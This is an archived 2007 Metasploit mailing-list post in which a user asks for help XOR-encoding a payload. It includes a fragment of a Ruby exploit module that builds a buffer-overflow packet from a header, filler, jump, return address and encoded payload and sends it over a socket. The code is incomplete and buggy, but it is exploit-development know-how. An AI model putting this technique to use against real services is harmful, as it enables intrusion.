Home page logo
/

metasploit logo Metasploit mailing list archives

Need assistance with payload xor
From: ri0t at ri0tnet.net (ri0t)
Date: Wed, 28 Mar 2007 12:52:21 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

having a bit of trouble xor'ing a payload in the new metasploit 3  
using Rex::Encoding::Xor::Generic

below is a small snippet of code

def exploit
                 xor = Rex::Encoding::Xor::Generic
                 connect

                 print_status("Trying target #{target.name}...")

                 header =
                "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00 
\x00\x00\x00"+
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00 
\x00\x00\x00"+
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 
\x00\x00\x01"+
                "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"

                 filler =  rand_text_english(1) * (target['Offset'])
                 jump = [0xeb06eb06].pack("V")
                 retadd = [target.ret].pack('V')
                 buffer=jump+retadd+payload.encoded
                 buffercoded= xor.encode(buffer, [0xb3].pack("V"))
                 sploit =  header + filler + buffercoded[0]
                 sock.put(sploit)

                 handler
                 disconnect
         end


unfortunatly the xor.encode only xor's the first byte of jump retadd  
and payload   not the entire buffer.  I am sure its something i am  
missing due to a simple lack of ruby knowledge but if anyone could  
point me in the right direction i would be greatful

thanks

ri0t
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFGCqtamTIaeYQNnq0RArwMAJ4wYNj0NszcdydMUSFTO4q6R2NyZwCbBnhP
MtW4Qxkp0iH07XoDRsfrYZI=
=Ss/h
-----END PGP SIGNATURE-----



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault